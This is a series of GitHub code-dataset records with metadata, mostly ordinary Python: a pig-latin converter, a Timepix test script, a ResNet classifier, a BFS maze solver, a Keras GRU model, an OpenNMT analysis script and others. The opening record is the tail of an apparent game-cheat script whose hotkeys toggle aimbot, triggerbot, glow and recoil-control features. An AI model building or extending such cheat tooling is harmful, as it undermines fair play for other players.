triggeronoff:\n            triggeronoff = False\n        else:\n            triggeronoff = True\n\n        printer()\n\n    elif win32api.GetAsyncKeyState(0x39):\n        time.sleep(0.2)\n        if glowonoff:\n            glowonoff = False\n        else:\n            glowonoff = True\n            if cleverglowonoff:\n                cleverglowonoff = False\n\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x36):\n        time.sleep(0.2)\n        if cleverglowonoff:\n            cleverglowonoff = False\n        else:\n            cleverglowonoff = True\n            if glowonoff:\n                glowonoff = False\n\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x35):\n        time.sleep(0.2)\n        if rcsonoff:\n            rcsonoff = False\n        else:\n            rcsonoff = True\n\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x28):\n        time.sleep(0.2)\n        if aimfov > 1.0:\n            aimfov -= 0.5\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x26):\n        time.sleep(0.2)\n        aimfov += 0.5\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x21):\n        time.sleep(0.2)\n        if aimbone == 8:\n            aimbone = 6\n        else:\n            aimbone = 8\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x22):\n        time.sleep(0.2)\n        if aimonoff:\n            aimonoff = False\n        else:\n            aimonoff = True\n\n        printer()\n\n\n    elif win32api.GetAsyncKeyState(0x2E):\n        quit()\n\n","repo_name":"adampzb/projekty","sub_path":"tests/letsgo.py","file_name":"letsgo.py","file_ext":"py","file_size_in_byte":26553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24071831152","text":"\n# 
Converts given string to pig latin and prints it \n# Takes first letter of word, moves it to end and adds 'ay'\n# If word begins with a vowel, simply ends in 'ay'\n# Prints the total number of words along with the number of words starting with vowels\n\n\nwordList = input('Sentences to convert to pig latin: ').lower().split()\nlength = len(wordList)\nprint(' > Number of words: %d\\n' % length)\nvowels = ('a', 'e', 'i', 'o', 'u')\nvoWo = 0\nregW = 0\n\nfor word in wordList:\n    if '.' in word:\n        if word[0] in vowels:\n            voWo += 1\n            vowel_end = word.find('.')\n            print(word[:vowel_end] + '-ay.')\n        else:\n            regW += 1\n            normal_end = word.find('.')\n            print(word[1:normal_end] + '-' + word[0] + 'ay.')\n    else:\n        if word[0] in vowels:\n            voWo += 1\n            print(word + '-ay', end=' ')\n        else:\n            regW += 1\n            print(word[1:] + '-' + word[0] + 'ay', end=' ')\n\nprint('\\n > Number of words beginning with vowel: %d\\n > Number of regular words: %d\\n' % (voWo, regW))\nquit()","repo_name":"galenscovell/Python-Foundations","sub_path":"Algorithms/PigLatin.py","file_name":"PigLatin.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72044547894","text":"import sys, os, math\r\nimport cv2\r\nimport numpy as np\r\nimport pyTimepixAngles as ta\r\n\r\npngImg = None\r\nfinished = False\r\n\r\ndef createController(basePath: str) -> ta.Tpx3DosageMeasurement:\r\n    con = ta.Tpx3DosageMeasurement(basePath)\r\n    con.setFilterSetup(basePath + \"/FilterSetup.obj\", 256, 256)\r\n    return con\r\n\r\ndef initControllerMeas(con: ta.Tpx3DosageMeasurement, basePath: str, qualli: str, angle: float, idx: int, useUnShadowsSource = False):\r\n    if useUnShadowsSource == True:\r\n        con.SetSimulationFileName(basePath + \"/InData/\" + qualli + \"/noShadow/Data_\" + str(angle) + \".t3pa\")\r\n    else:\r\n        con.SetSimulationFileName(basePath + \"/InData/\" + qualli + \"/Data_\" + str(angle) + \".t3pa\")\r\n    \r\n    if con.doDataDrivenMode():\r\n        print(\"\\nStarted Data driven mode: \" + str(angle) + \"!\")\r\n\r\ndef getImgAt(basePath: str, qualli: str, degree: float, frameNumber: int):\r\n    p = basePath + \"/outImgs/\"+ qualli +\"/img_\" + \"{:10.6f}\".format(degree) + \"_(\" + str(frameNumber) + \").png\"\r\n    print(\"Try read: \" + p)\r\n    return cv2.imread(p)\r\n\r\ndef onCalcFinished(image, angles: ta.FVector3D, shadows: ta.FShadowSetup):\r\n    global finished\r\n    print(\"Calc finished!\")\r\n    setup = ta.RadiationAngleReconstructor.getShadowSetup()\r\n    angles.X = angles.X * (180.0 / math.pi)\r\n    angles.Y = angles.Y * (180.0 / math.pi)\r\n    angles.Z = angles.Z * (180.0 / math.pi)\r\n    if angles.X == float(\"inf\"):\r\n        return\r\n\r\n    cp = pngImg.copy()\r\n    for s in setup.singleShadows:\r\n        cv2.ellipse(cp, (int(s.getCenterX()), int(s.getCenterY())), (int(s.radiusX), int(s.radiusY)), (180.0 / math.pi) * setup.rotationAngle2D, 0, 360, (0, 0, 255), 2)\r\n\r\n    cv2.imshow(\"Shadows\", cp)\r\n    finished = True\r\n\r\nif __name__ == \"__main__\":\r\n    print(\"Version: \" + ta.__version__)\r\n\r\n    ## Test if we have access to the most basic constructs\r\n    coord = ta.katherine_coord_t()\r\n    print(coord)\r\n    coord.x = 1\r\n    print(coord)\r\n    assert coord.x == 1\r\n    ta.RadiationAngleReconstructor.SetShadowThreshold(1.1)\r\n    print(\"ShadowThreshold: \" + str(ta.RadiationAngleReconstructor.GetShadowThreshold()))\r\n    assert ta.RadiationAngleReconstructor.GetShadowThreshold() > 1.09 and ta.RadiationAngleReconstructor.GetShadowThreshold() < 1.11\r\n\r\n    ## initialize the openCL execution. 
Devices can be choosen or selected by default\r\n ta.initializeExecutor(False)\r\n\r\n bp = os.path.dirname(sys.argv[0])\r\n q = input(\"Wähle Strahlenqualität (C60/A80)\")\r\n e_in = input(\"Evaluation des controllers(c) oder einzelner module(m)?\")\r\n\r\n if e_in[0] == 'c':\r\n e_in = input(\"Sollen Test Daten(d) oder Bilder(b) ausgewertet werden oder sollen die unverarbeiteten Bilder ausgegeben (o) werden? [bb[x] = bilder bluring mit x radius; bpp = Zeige Wahrscheinlichkeiten aus Bildern und Positionen; bpa = Zeige Wahrscheinlichkeiten aus Bildern und Winkeln]\")\r\n imgPath = bp + \"/outImgs/\" + q\r\n expectedAngles = []\r\n if q == \"C60\":\r\n expectedAngles = [0.0, 10.0, -10.0, 20.0, -20.0, 30.0, -30.0, 35.0, -35.0, 40.0, -40.0, 45.0, -45.0]\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.06)\r\n else:\r\n expectedAngles = [0.0]\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.06)\r\n\r\n if e_in[0] == 'b':\r\n con = createController(bp)\r\n print(con)\r\n ta.RadiationAngleReconstructor.SetFilterSetup(con.getFilterSetup())\r\n middlePinIdx = con.getFilterSetup().getFilterIndexByName(\"Pin9_Cube.000\")\r\n\r\n bUseYRot = input(\"Should use y-Rotation? (y/n)\") == \"y\"\r\n bRestrictShadows = input(\"Should use shadow border? (y/n)\") == \"y\"\r\n\r\n for i in range(0, len(expectedAngles)):\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.07)\r\n ta.RadiationAngleReconstructor.SetMaxThreadCount(48)\r\n ta.RadiationAngleReconstructor.SetPreviousFoundRotation(ta.FVector2D(0,0))\r\n ta.RadiationAngleReconstructor.SetCurrentScore(0)\r\n \r\n pngImg = getImgAt(bp, q, expectedAngles[i - 1], 0)\r\n img = np.zeros([pngImg.shape[0], pngImg.shape[1]], dtype=np.uint8)\r\n img = cv2.cvtColor(pngImg, cv2.COLOR_RGBA2GRAY)\r\n cv2.imshow(\"Read\", img)\r\n cv2.waitKey(1)\r\n\r\n integratedPixels = ta.OCLImage2D()\r\n integratedPixels.setHostPointerMode(ta.EOCLAccessTypes.ATRead)\r\n integratedPixels.setHostPointer(img.data)\r\n integratedPixels.setVariableChanged(True)\r\n\r\n print(\"Start calc of: \" + str(expectedAngles[i - 1]))\r\n rar = ta.RadiationAngleReconstructor(integratedPixels.makeShared())\r\n print(rar)\r\n rar.calcParallelInRayAngle(onCalcFinished)\r\n print(rar)\r\n\r\n cv2.waitKey(5000)\r\n\r\n print(rar)","repo_name":"Centrasis/pyTpx3Angles","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74980346933","text":"from torch import nn\nimport torchvision\nfrom src.utils.utils import batch_tensor, unbatch_tensor\nimport torch\n\nclass Shape_Feature_Extractor(nn.Module):\n def __init__(\n self,\n ):\n super().__init__()\n\n # Model to be used is ResNet 50\n self.model = torchvision.models.resnet50(pretrained=True)\n\n # Get output before fc layer\n self.model = nn.Sequential(*list(self.model.children())[:-1])\n self.Linear1 = nn.Linear(2048, 1024)\n self.ReLU1 = nn.ReLU()\n self.Dropout1 = nn.Dropout(0.2)\n self.Linear2 = nn.Linear(1024, 512)\n self.ReLU2 = nn.ReLU()\n self.Dropout2 = nn.Dropout(0.2)\n self.Linear3 = nn.Linear(512, 79)\n self.log_softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input):\n B, M, C, H, W = input.shape\n input = batch_tensor(input, dim=1,squeeze=True)\n input = self.model(input)\n input = input.view(B*M, -1)\n input = self.Linear1(input)\n input = self.ReLU1(input)\n input = self.Dropout1(input)\n input = self.Linear2(input)\n input = self.ReLU2(input)\n input = 
self.Dropout2(input)\n        input = self.Linear3(input)\n        input = self.log_softmax(input).clone()\n\n        input = unbatch_tensor(input, B, dim=1, unsqueeze=True)\n        output = torch.max(input, dim=1)[0]\n\n        return output.squeeze()\n\n","repo_name":"TheShiningVampire/DDP1","sub_path":"src/models/components/shape_feature_extractor.py","file_name":"shape_feature_extractor.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5631762876","text":"import sys\nsys.stdin = open('input.txt')\nfrom collections import deque\n\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef bfs(start):\n    Q.append(start)\n    global result\n\n    while Q:\n        x, y = Q.popleft()\n        for k in range(4):\n            nx = x + dx[k]\n            ny = y + dy[k]\n\n            if 0 <= nx < N and 0 <= ny < N:\n                if visited[nx][ny] == 0 and maze[nx][ny] != 1:\n                    visited[nx][ny] = visited[x][y] + 1\n\n                    if maze[nx][ny] == 3:\n                        result = visited[nx][ny] - 1\n                        return result\n                    Q.append((nx, ny))\n    return result\n\n\nT = int(input())\nfor tc in range(1, T+1):\n    N = int(input())\n    maze = [list(map(int, input())) for _ in range(N)]\n    visited = [[0 for _ in range(N)] for _ in range(N)]\n\n    result = 0\n    Q = deque()\n\n    for i in range(N):\n        for j in range(N):\n            if maze[i][j] == 2:\n                start = (i, j)\n\n    print(f'#{tc} {bfs(start)}')\n","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/5105_미로의 거리/미로의 거리 2.py","file_name":"미로의 거리 2.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41369319496","text":"import time\n\nimport keras.models\nimport matplotlib.pyplot as plt\nimport numpy\nfrom keras.layers import Dense, Dropout, Flatten, GRU\nfrom keras.models import Sequential\n\nimport B_Mind\n\n\ndef Boleslaw(\n        testSet=0.98,\n        l1_size=512,\n        l2_size=512,\n        l3_size=200,\n        l4_size=0,\n        l5_size=0,\n        l1_activation='relu',\n        l2_activation='relu',\n        l3_activation='relu',\n        l4_activation='relu',\n        l5_activation='relu',\n        loss='mean_squared_error',\n        optimizer='rmsprop',\n        metrics=['accuracy'],\n        epochs=80,\n        validation_split=0.01,\n        batch_size=200,\n        FILE_NAME='histData/GER30Cash15.csv',\n        dropout=0.2,\n        histReq=16\n):\n    rand = time.time()\n    Data = B_Mind.LoadFile(FILE_NAME)\n\n    NormData = B_Mind.AddNormData(Data)\n\n    Labels, Data = B_Mind.AddIndicatorsAndHist(NormData, histReq)\n    train_x, train_y, test_x, test_y = B_Mind.SelectData(Data, Labels, testSet)\n    i, j, k = train_x.shape\n    # numpy.savetxt(\"data/x_ful.csv\", train_x[100,:,:], delimiter=\",\")\n\n    model = Sequential()\n    model.add(GRU(l1_size, return_sequences=True, activation=l1_activation, input_shape=(j, k)))\n    model.add(Dropout(dropout))\n    if l2_size > 0:\n        model.add(GRU(l2_size, return_sequences=True, activation=l2_activation))\n        model.add(Dropout(dropout))\n    # if l3_size>0:\n    # \tmodel.add(GRU(l3_size,return_sequences=True,activation=l3_activation))\n    # if l4_size>0:\n    # \tmodel.add(Dense(l4_size))\n    # \tmodel.add(Activation(l4_activation))\n    # if l5_size>0:\n    # \tmodel.add(Dense(l5_size))\n    # \tmodel.add(Activation(l5_activation))\n    model.add(Flatten())\n    model.add(Dense(1))\n\n    callback_early_stopping = keras.callbacks.EarlyStopping(monitor='val_loss',\n                                                            patience=5, verbose=1)\n    callback_reduce_lr = keras.callbacks.ReduceLROnPlateau(monitor='val_loss',\n                                                           factor=0.1,\n                                                           min_lr=1e-4,\n                                                           patience=0,\n                                                           verbose=1)\n    callback_tensorboard = keras.callbacks.TensorBoard(log_dir='./Graph', histogram_freq=1, write_graph=True)\n    callbacks = 
[callback_early_stopping,\n                 callback_tensorboard,\n                 callback_reduce_lr]\n\n    model.compile(loss=loss,\n                  optimizer=optimizer,\n                  metrics=metrics)\n    history = model.fit(train_x, train_y,\n                        batch_size=batch_size,\n                        epochs=epochs,\n                        verbose=0,\n                        validation_split=validation_split,\n                        callbacks=callbacks,\n                        shuffle=False)\n\n    score = model.evaluate(test_x, test_y,\n                           batch_size=batch_size, verbose=0)\n    print('Test score:', score[0])\n    print('Test accuracy:', score[1])\n    model.summary()\n\n    prediction = model.predict(test_x)\n\n    i = len(test_y)\n    t = numpy.arange(0, i, 1)\n    fig, ax = plt.subplots()\n    ax.plot(t, test_y, 'b-', t, prediction, 'g-')\n    ax.grid()\n    plt.show()\n    plt.close(\"all\")\n\n\nBoleslaw()\n","repo_name":"BadMojo123/Machine_learning","sub_path":"Simple DNN/Boleslaw2.py","file_name":"Boleslaw2.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"68162224","text":"import pygame\n\nfrom pygame.sprite import Sprite\n\nclass Star(Sprite):\n\tdef __init__(self, ai_game):\n\t\tsuper().__init__()\n\t\tself.screen = ai_game.screen\n\t\t# load the star image\n\t\tself.image = pygame.image.load('images/star.bmp')\n\t\tself.rect = self.image.get_rect()\n\t\t# set the initial position\n\t\tself.rect.x = self.rect.width\n\t\tself.rect.y = self.rect.height\n\n\t\tself.x = float(self.rect.x)\n","repo_name":"youfree568/new2","sub_path":"star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46582044534","text":"def main():\n    soma = 0\n    while True:\n        print(\"CÓDIGO PRODUTO PREÇO (R$)\")\n        print(\"H Hamburger 5,50\")\n        print(\"C Cheeseburger 6,80\")\n        print(\"M Misto Quente 4,50\")\n        print(\"A Americano 7,00\")\n        print(\"Q Queijo Prato 4,00\")\n        print(\"X PARA TOTAL DA CONTA\")\n        codigo = input().upper()[0]\n        if codigo != 'X':\n            if codigo == 'H':\n                soma += 5.50\n            elif codigo == 'C':\n                soma += 6.80\n            elif codigo == 'M':\n                soma += 4.50\n\n            elif codigo == 'A':\n                soma += 7.00\n\n            elif codigo == 'Q':\n                soma += 4.00\n\n            elif codigo not in 'H C M A Q':\n                print(\"Opção inválida.\")\n\n        if codigo == 'X': break\n    if soma != 0:\n        print(f'{soma:.2f}')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Atividade 02 - semana 06/questão4_semana6_atividade02_runcodes.py","file_name":"questão4_semana6_atividade02_runcodes.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5400148407","text":"class Solution:\n    def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n        # bottom up approach\n        # we start with one candidate, and keep on adding one candidate after another until\n        # sum is either larger than target, in which case, we dont proceed further;\n        # or if sum is equal to target, we append the sequence to output.\n        \n        self.out = []\n        def combination(sum_until_now, seq_until_now, index):\n            if sum_until_now > target: return\n            if sum_until_now == target: \n                self.out.append(seq_until_now)\n                return\n            \n            # this is the important part. we ignore the candidates smaller than the last appended candidate in the sequence\n            # this naturally sorts the sequence in ascending order. 
and thus avoids repeating sequences\n for i in range(index, len(candidates)):\n combination(sum_until_now + candidates[i], seq_until_now + [candidates[i]], i)\n \n combination(0, [], 0)\n return self.out\n \n #the other way to solve this is backtracking. we take the target, and keep on substracting candidates, and check if 0\n # is reached and add the sequence into the out\n # we can also use dp to solve\n","repo_name":"gkpani97/Grind75","sub_path":"week 5/b. combination sum LC 39 M.py","file_name":"b. combination sum LC 39 M.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2974777243","text":"# encoding: utf-8\n\nimport os\nimport re\n\nfrom links import auth, config\nfrom links.util import workflow\n\nimport logging\nfrom logging.config import fileConfig\n\nfrom workflow import PasswordNotFound\n\nfileConfig('logging_config.ini')\nlog = logging.getLogger('links')\n\nCOMMAND_PATTERN = re.compile(r'^[^\\w\\s]+', re.UNICODE)\nACTION_PATTERN = re.compile(r'^\\W+', re.UNICODE)\n\n\ndef route(args):\n log.info(u'in route process')\n\n # debug\n # try:\n # workflow().delete_password(config.KC_OAUTH_TOKEN)\n # except PasswordNotFound as e:\n # log.error(e)\n\n handler = None\n command = []\n command_string = ''\n action = 'none'\n\n if args:\n command_string = args[0]\n # log.info('route args')\n # for arg in args:\n # log.info(arg)\n else:\n log.info('route with empty args')\n\n command_string = re.sub(COMMAND_PATTERN, '', command_string)\n command = re.split(r' +', command_string)\n\n if command:\n action = re.sub(ACTION_PATTERN, '', command[0]) or 'none'\n\n if 'about'.find(action) == 0:\n from links.handlers import about\n handler = about\n elif not auth.is_authorized():\n from links.handlers import login\n handler = login\n elif 'logout'.find(action) == 0:\n from links.handlers import logout\n handler = logout\n elif 'moreQuery'.find(action) == 0:\n from links.handlers import query_count\n handler = query_count\n elif 'pref'.find(action) == 0:\n from links.handlers import preferences\n handler = preferences\n elif 'result_count'.find(action) == 0:\n from links.handlers import result_count\n handler = result_count\n\n elif action.find('search') == 0:\n from links.handlers import search\n handler = search\n\n # If the command starts with a space (no special keywords), the workflow\n # creates a new task\n elif not command_string:\n from links.handlers import welcome\n handler = welcome\n\n else:\n from links.handlers import welcome\n handler = welcome\n\n if handler:\n if '--commit' in args:\n modifier = re.search(r'--(alt|cmd|ctrl|fn)\\b', ' '.join(args))\n\n if modifier:\n modifier = modifier.group(1)\n\n handler.commit(command, modifier)\n else:\n handler.filter(command)\n workflow().send_feedback()\n\n","repo_name":"tickstep/alfred-links-workflow","sub_path":"links/handlers/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23290275949","text":"#!/usr/bin/env python\n\"\"\"Train models.\"\"\"\nimport traceback\n\nimport torch\n\nimport onmt\nimport onmt.opts as opts\nfrom onmt.inputters.inputter import build_dataset_iter, \\\n build_dataset_iter_multiple\nfrom onmt.model_builder import load_test_model\nfrom onmt.utils.logging import init_logger, logger\nfrom onmt.utils.misc import set_random_seed\nfrom onmt.utils.parse import ArgumentParser\n\n\ndef 
analysis(opt):\n # ArgumentParser.validate_train_opts(opt)\n # ArgumentParser.update_model_opts(opt)\n # ArgumentParser.validate_model_opts(opt)\n\n opt.gpu_ranks = [opt.gpu] if opt.gpu != -1 else []\n\n if opt.gpu != -1 and torch.cuda.is_available(): # case 1 GPU only\n run_single(opt, opt.gpu)\n else: # case only CPU\n run_single(opt, -1)\n\n\ndef _get_parser():\n parser = ArgumentParser(description='analysis.py')\n\n opts.config_opts(parser)\n opts.model_opts(parser)\n opts.analysis_opts(parser)\n return parser\n\n\ndef main():\n parser = _get_parser()\n\n opt = parser.parse_args()\n analysis(opt)\n\n\ndef _tally_parameters(model):\n enc = 0\n dec = 0\n for name, param in model.named_parameters():\n if 'encoder' in name:\n enc += param.nelement()\n else:\n dec += param.nelement()\n return enc + dec, enc, dec\n\n\ndef configure_process(opt, device_id):\n if device_id >= 0:\n torch.cuda.set_device(device_id)\n set_random_seed(opt.seed, device_id >= 0)\n\n\ndef run_single(opt, device_id, batch_queue=None, semaphore=None):\n # NOTE: It's important that ``opt`` has been validated and updated\n # at this point.\n configure_process(opt, device_id)\n init_logger(opt.log_file)\n\n # Build model.\n logger.info('Loading model from %s' % opt.model)\n fields, model, model_opt = load_test_model(opt, opt.model)\n print(model)\n ArgumentParser.update_model_opts(model_opt)\n ArgumentParser.validate_model_opts(model_opt)\n logger.info('Loading vocab from model at %s.' % opt.model)\n\n # Report src and tgt vocab sizes, including for features\n for side in ['src', 'tgt']:\n f = fields[side]\n try:\n f_iter = iter(f)\n except TypeError:\n f_iter = [(side, f)]\n for sn, sf in f_iter:\n if sf.use_vocab:\n logger.info(' * %s vocab size = %d' % (sn, len(sf.vocab)))\n\n n_params, enc, dec = _tally_parameters(model)\n logger.info('encoder: %d' % enc)\n logger.info('decoder: %d' % dec)\n logger.info('* number of parameters: %d' % n_params)\n\n steper = Steper()\n\n trainer = build_trainer(\n opt, device_id, model, fields, steper)\n\n if len(opt.data_ids) > 1:\n train_shards = []\n for train_id in opt.data_ids:\n shard_base = \"train_\" + train_id\n train_shards.append(shard_base)\n train_iter = build_dataset_iter_multiple(train_shards, fields, opt)\n else:\n if opt.data_ids[0] is not None:\n shard_base = \"train_\" + opt.data_ids[0]\n else:\n shard_base = \"train\"\n train_iter = build_dataset_iter(shard_base, fields, opt)\n\n if opt.gpu != -1:\n logger.info('Starting training on GPU: %s' % opt.gpu)\n else:\n logger.info('Starting training on CPU, could be very slow')\n\n train_steps = 0\n\n trainer.train(\n train_iter,\n train_steps)\n\n if trainer.report_manager.tensorboard_writer is not None:\n trainer.report_manager.tensorboard_writer.close()\n\n\ndef build_trainer(opt, device_id, model, fields, steper, model_saver=None):\n \"\"\"\n Simplify `Trainer` creation based on user `opt`s*\n\n Args:\n opt (:obj:`Namespace`): user options (usually from argument parsing)\n model (:obj:`onmt.models.NMTModel`): the model to train\n fields (dict): dict of fields\n steper (:obj:`onmt.utils.steperizer`): steperizer used during training\n data_type (str): string describing the type of data\n e.g. 
\"text\", \"img\", \"audio\"\n model_saver(:obj:`onmt.models.ModelSaverBase`): the utility object\n used to save the model\n \"\"\"\n\n tgt_field = dict(fields)[\"tgt\"].base_field\n train_loss = onmt.utils.loss.build_loss_compute(model, tgt_field, opt, do_backward=False)\n\n if device_id >= 0:\n n_gpu = 1\n gpu_rank = device_id\n else:\n gpu_rank = 0\n n_gpu = 0\n\n\n report_manager = onmt.utils.build_report_manager(opt, gpu_rank)\n trainer = Trainer(model, train_loss, steper,\n n_gpu=n_gpu, gpu_rank=gpu_rank, report_manager=report_manager,\n with_align=True if opt.lambda_align > 0 else False)\n return trainer\n\n\nclass Steper(object):\n def __init__(self):\n self.analysis_step = 0\n self._fp16 = None\n\n def step(self, step=1):\n self.analysis_step += step\n\n\nclass Trainer(object):\n\n def __init__(self, model, train_loss, steper,\n trunc_size=0, shard_size=32,\n norm_method=\"sents\",\n n_gpu=1, gpu_rank=1,\n report_manager=None, with_align=False, model_saver=None,\n average_decay=0, average_every=1, model_dtype='fp32'):\n # Basic attributes.\n self.model = model\n self.train_loss = train_loss\n self.steper = steper\n self.trunc_size = trunc_size\n self.shard_size = shard_size\n self.norm_method = norm_method\n self.n_gpu = n_gpu\n self.gpu_rank = gpu_rank\n self.report_manager = report_manager\n self.with_align = with_align\n self.model_saver = model_saver\n self.average_decay = average_decay\n self.moving_average = None\n self.average_every = average_every\n self.model_dtype = model_dtype\n\n self.model.train()\n\n def _accum_batches(self, iterator):\n batches = []\n normalization = 0\n for batch in iterator:\n batches.append(batch)\n if self.norm_method == \"tokens\":\n num_tokens = batch.tgt[1:, :, 0].ne(\n self.train_loss.padding_idx).sum()\n normalization += num_tokens.item()\n else:\n normalization += batch.batch_size\n yield batches, normalization\n batches = []\n normalization = 0\n if batches:\n yield batches, normalization\n\n def _update_average(self, step):\n if self.moving_average is None:\n copy_params = [params.detach().float()\n for params in self.model.parameters()]\n self.moving_average = copy_params\n else:\n average_decay = max(self.average_decay,\n 1 - (step + 1) / (step + 10))\n for (i, avg), cpt in zip(enumerate(self.moving_average),\n self.model.parameters()):\n self.moving_average[i] = \\\n (1 - average_decay) * avg + \\\n cpt.detach().float() * average_decay\n\n def train(self,\n train_iter,\n train_steps):\n\n total_stats = onmt.utils.Statistics()\n report_stats = onmt.utils.Statistics()\n self._start_report_manager(start_time=total_stats.start_time)\n\n for i, (batches, normalization) in enumerate(\n self._accum_batches(train_iter)):\n self.steper.step(batches[0].tgt.size(1))\n step = self.steper.analysis_step\n\n if self.n_gpu > 1:\n normalization = sum(onmt.utils.distributed\n .all_gather_list\n (normalization))\n\n self._gradient_accumulation(\n batches, normalization, total_stats,\n report_stats)\n\n if self.average_decay > 0 and i % self.average_every == 0:\n self._update_average(step)\n\n report_stats = self._maybe_report_training(\n step, train_steps,\n report_stats)\n\n if 0 < train_steps <= step:\n break\n\n return total_stats\n\n def _gradient_accumulation(self, true_batches, normalization, total_stats,\n report_stats):\n\n for k, batch in enumerate(true_batches):\n target_size = batch.tgt.size(0)\n # Truncated BPTT: reminder not compatible with accum > 1\n if self.trunc_size:\n trunc_size = self.trunc_size\n else:\n trunc_size = target_size\n\n 
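# batch.src may be a plain tensor or a (tensor, lengths) tuple when the encoder\n            # consumes source lengths, hence the isinstance check on the next statement\n            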
src, src_lengths = batch.src if isinstance(batch.src, tuple) \\\n else (batch.src, None)\n if src_lengths is not None:\n report_stats.n_src_words += src_lengths.sum().item()\n\n tgt_outer = batch.tgt\n\n bptt = False\n for j in range(0, target_size - 1, trunc_size):\n # 1. Create truncated target.\n tgt = tgt_outer[j: j + trunc_size]\n\n outputs, attns, new_cost = self.model(src, tgt, src_lengths, bptt=bptt,\n with_align=self.with_align)\n bptt = True\n\n # 3. Compute loss.\n loss, batch_stats = self.train_loss(\n batch,\n outputs,\n attns,\n normalization=normalization,\n shard_size=self.shard_size,\n trunc_start=j,\n trunc_size=trunc_size,\n new_cost=new_cost)\n\n total_stats.update(batch_stats)\n report_stats.update(batch_stats)\n\n # If truncated, don't backprop fully.\n # TO CHECK\n # if dec_state is not None:\n # dec_state.detach()\n if self.model.decoder.state is not None:\n self.model.decoder.detach_state()\n\n def _start_report_manager(self, start_time=None):\n \"\"\"\n Simple function to start report manager (if any)\n \"\"\"\n if self.report_manager is not None:\n if start_time is None:\n self.report_manager.start()\n else:\n self.report_manager.start_time = start_time\n\n def _maybe_gather_stats(self, stat):\n \"\"\"\n Gather statistics in multi-processes cases\n\n Args:\n stat(:obj:onmt.utils.Statistics): a Statistics object to gather\n or None (it returns None in this case)\n\n Returns:\n stat: the updated (or unchanged) stat object\n \"\"\"\n if stat is not None and self.n_gpu > 1:\n return onmt.utils.Statistics.all_gather_stats(stat)\n return stat\n\n def _maybe_report_training(self, step, num_steps,\n report_stats):\n \"\"\"\n Simple function to report training stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_training` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_training(\n step, num_steps, 0, report_stats,\n multigpu=self.n_gpu > 1)\n\n def _report_step(self, step, train_stats=None,\n valid_stats=None):\n \"\"\"\n Simple function to report stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_step` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_step(0,\n step, train_stats=train_stats,\n valid_stats=valid_stats)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"he1ght/Concept_Equalization_with_Transformer","sub_path":"irr_nmt/onmt/bin/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73373185011","text":"\"\"\"symbols and Matric are imported from sympy library.\n\nos and sys are used to access the program that is being tested and present\nin the cc_params directory.\n\"\"\"\nimport os\nimport sys\nfrom sympy import symbols\nfrom sympy.matrices import Matrix\nmodule_path = os.path.dirname(os.path.pardir + os.path.sep)\nmodule_path = os.path.join(module_path, \"cc_params\")\nsys.path.insert(0, os.path.abspath(module_path))\nimport prog_tf as prog\n\n\ndef test_conductance_matrix():\n \"\"\"\n Test the formation of the conductance matrix for 4 given networks.\n\n Network1: Voltage source is not connected to the ground.\n Network2: A simple series RLC circuit\n Network3: A network with three elements connected between two nodes\n Network4: A complex network with 5 nodes (including the reference node)\n\n In order to test only specific functions we add attributes to the required\n test 
